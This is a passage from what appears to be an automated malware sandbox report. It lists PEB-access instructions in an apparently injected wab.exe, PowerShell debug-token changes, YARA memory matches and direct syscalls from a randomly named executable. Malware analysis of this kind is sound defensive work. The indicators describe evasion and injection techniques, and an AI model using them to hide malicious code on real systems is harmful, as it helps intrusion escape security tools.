          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143866E mov eax, dword ptr fs:[00000030h]10_2_2143866E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143866E mov eax, dword ptr fs:[00000030h]10_2_2143866E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE609 mov eax, dword ptr fs:[00000030h]10_2_213EE609
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A2674 mov eax, dword ptr fs:[00000030h]10_2_213A2674
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA660 mov eax, dword ptr fs:[00000030h]10_2_213AA660
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA660 mov eax, dword ptr fs:[00000030h]10_2_213AA660
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138C640 mov eax, dword ptr fs:[00000030h]10_2_2138C640
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A66B0 mov eax, dword ptr fs:[00000030h]10_2_213A66B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC6A6 mov eax, dword ptr fs:[00000030h]10_2_213AC6A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374690 mov eax, dword ptr fs:[00000030h]10_2_21374690
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374690 mov eax, dword ptr fs:[00000030h]10_2_21374690
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F06F1 mov eax, dword ptr fs:[00000030h]10_2_213F06F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F06F1 mov eax, dword ptr fs:[00000030h]10_2_213F06F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA6C7 mov ebx, dword ptr fs:[00000030h]10_2_213AA6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA6C7 mov eax, dword ptr fs:[00000030h]10_2_213AA6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F892A mov eax, dword ptr fs:[00000030h]10_2_213F892A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC912 mov eax, dword ptr fs:[00000030h]10_2_213FC912
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368918 mov eax, dword ptr fs:[00000030h]10_2_21368918
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368918 mov eax, dword ptr fs:[00000030h]10_2_21368918
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE908 mov eax, dword ptr fs:[00000030h]10_2_213EE908
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE908 mov eax, dword ptr fs:[00000030h]10_2_213EE908
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21414978 mov eax, dword ptr fs:[00000030h]10_2_21414978
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21414978 mov eax, dword ptr fs:[00000030h]10_2_21414978
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC97C mov eax, dword ptr fs:[00000030h]10_2_213FC97C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E mov eax, dword ptr fs:[00000030h]10_2_213B096E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E mov edx, dword ptr fs:[00000030h]10_2_213B096E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E mov eax, dword ptr fs:[00000030h]10_2_213B096E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21396962 mov eax, dword ptr fs:[00000030h]10_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21396962 mov eax, dword ptr fs:[00000030h]10_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21396962 mov eax, dword ptr fs:[00000030h]10_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2140892B mov eax, dword ptr fs:[00000030h]10_2_2140892B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F0946 mov eax, dword ptr fs:[00000030h]10_2_213F0946
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214069C0 mov eax, dword ptr fs:[00000030h]10_2_214069C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F89B3 mov esi, dword ptr fs:[00000030h]10_2_213F89B3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F89B3 mov eax, dword ptr fs:[00000030h]10_2_213F89B3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F89B3 mov eax, dword ptr fs:[00000030h]10_2_213F89B3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143A9D3 mov eax, dword ptr fs:[00000030h]10_2_2143A9D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213709AD mov eax, dword ptr fs:[00000030h]10_2_213709AD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213709AD mov eax, dword ptr fs:[00000030h]10_2_213709AD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A29F9 mov eax, dword ptr fs:[00000030h]10_2_213A29F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A29F9 mov eax, dword ptr fs:[00000030h]10_2_213A29F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE9E0 mov eax, dword ptr fs:[00000030h]10_2_213FE9E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A49D0 mov eax, dword ptr fs:[00000030h]10_2_213A49D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA830 mov eax, dword ptr fs:[00000030h]10_2_213AA830
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov ecx, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC810 mov eax, dword ptr fs:[00000030h]10_2_213FC810
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406870 mov eax, dword ptr fs:[00000030h]10_2_21406870
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406870 mov eax, dword ptr fs:[00000030h]10_2_21406870
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE872 mov eax, dword ptr fs:[00000030h]10_2_213FE872
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE872 mov eax, dword ptr fs:[00000030h]10_2_213FE872
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A0854 mov eax, dword ptr fs:[00000030h]10_2_213A0854
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374859 mov eax, dword ptr fs:[00000030h]10_2_21374859
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374859 mov eax, dword ptr fs:[00000030h]10_2_21374859
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21382840 mov ecx, dword ptr fs:[00000030h]10_2_21382840
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141483A mov eax, dword ptr fs:[00000030h]10_2_2141483A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141483A mov eax, dword ptr fs:[00000030h]10_2_2141483A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC89D mov eax, dword ptr fs:[00000030h]10_2_213FC89D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143A8E4 mov eax, dword ptr fs:[00000030h]10_2_2143A8E4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370887 mov eax, dword ptr fs:[00000030h]10_2_21370887
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC8F9 mov eax, dword ptr fs:[00000030h]10_2_213AC8F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC8F9 mov eax, dword ptr fs:[00000030h]10_2_213AC8F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E8C0 mov eax, dword ptr fs:[00000030h]10_2_2139E8C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406B40 mov eax, dword ptr fs:[00000030h]10_2_21406B40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406B40 mov eax, dword ptr fs:[00000030h]10_2_21406B40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143AB40 mov eax, dword ptr fs:[00000030h]10_2_2143AB40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21418B42 mov eax, dword ptr fs:[00000030h]10_2_21418B42
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EB20 mov eax, dword ptr fs:[00000030h]10_2_2139EB20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EB20 mov eax, dword ptr fs:[00000030h]10_2_2139EB20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136CB7E mov eax, dword ptr fs:[00000030h]10_2_2136CB7E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21438B28 mov eax, dword ptr fs:[00000030h]10_2_21438B28
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21438B28 mov eax, dword ptr fs:[00000030h]10_2_21438B28
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380BBE mov eax, dword ptr fs:[00000030h]10_2_21380BBE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380BBE mov eax, dword ptr fs:[00000030h]10_2_21380BBE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141EBD0 mov eax, dword ptr fs:[00000030h]10_2_2141EBD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EBFC mov eax, dword ptr fs:[00000030h]10_2_2139EBFC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378BF0 mov eax, dword ptr fs:[00000030h]10_2_21378BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378BF0 mov eax, dword ptr fs:[00000030h]10_2_21378BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378BF0 mov eax, dword ptr fs:[00000030h]10_2_21378BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FCBF0 mov eax, dword ptr fs:[00000030h]10_2_213FCBF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390BCB mov eax, dword ptr fs:[00000030h]10_2_21390BCB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390BCB mov eax, dword ptr fs:[00000030h]10_2_21390BCB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390BCB mov eax, dword ptr fs:[00000030h]10_2_21390BCB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370BCD mov eax, dword ptr fs:[00000030h]10_2_21370BCD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370BCD mov eax, dword ptr fs:[00000030h]10_2_21370BCD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370BCD mov eax, dword ptr fs:[00000030h]10_2_21370BCD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA38 mov eax, dword ptr fs:[00000030h]10_2_213ACA38
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21394A35 mov eax, dword ptr fs:[00000030h]10_2_21394A35
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21394A35 mov eax, dword ptr fs:[00000030h]10_2_21394A35
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EA2E mov eax, dword ptr fs:[00000030h]10_2_2139EA2E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA24 mov eax, dword ptr fs:[00000030h]10_2_213ACA24
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FCA11 mov eax, dword ptr fs:[00000030h]10_2_213FCA11
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ECA72 mov eax, dword ptr fs:[00000030h]10_2_213ECA72
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ECA72 mov eax, dword ptr fs:[00000030h]10_2_213ECA72
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA6F mov eax, dword ptr fs:[00000030h]10_2_213ACA6F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA6F mov eax, dword ptr fs:[00000030h]10_2_213ACA6F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213ACA6F mov eax, dword ptr fs:[00000030h]10_2_213ACA6F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380A5B mov eax, dword ptr fs:[00000030h]10_2_21380A5B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380A5B mov eax, dword ptr fs:[00000030h]10_2_21380A5B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376A50 mov eax, dword ptr fs:[00000030h]10_2_21376A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213C6AA4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A8A90 mov edx, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444A80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AAAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AAAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21370AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A4AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A4AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213C6ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213C6ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213C6ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F8D20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21366D10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21366D10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21366D10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A4D1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21408D6B mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138AD00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138AD00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138AD00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21428D10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21428D10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21370D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21370D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21370D59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21398DBF mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21398DBF mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213ACDB1 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213ACDB1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213ACDB1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A6DA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21410DF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21410DF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21366DF6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139CDF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139CDF0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137ADE0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137ADE0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137ADE0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: amsi64_4324.amsi.csv, type: OTHER
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtOpenSection: Direct from: 0x76EF2E0C
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
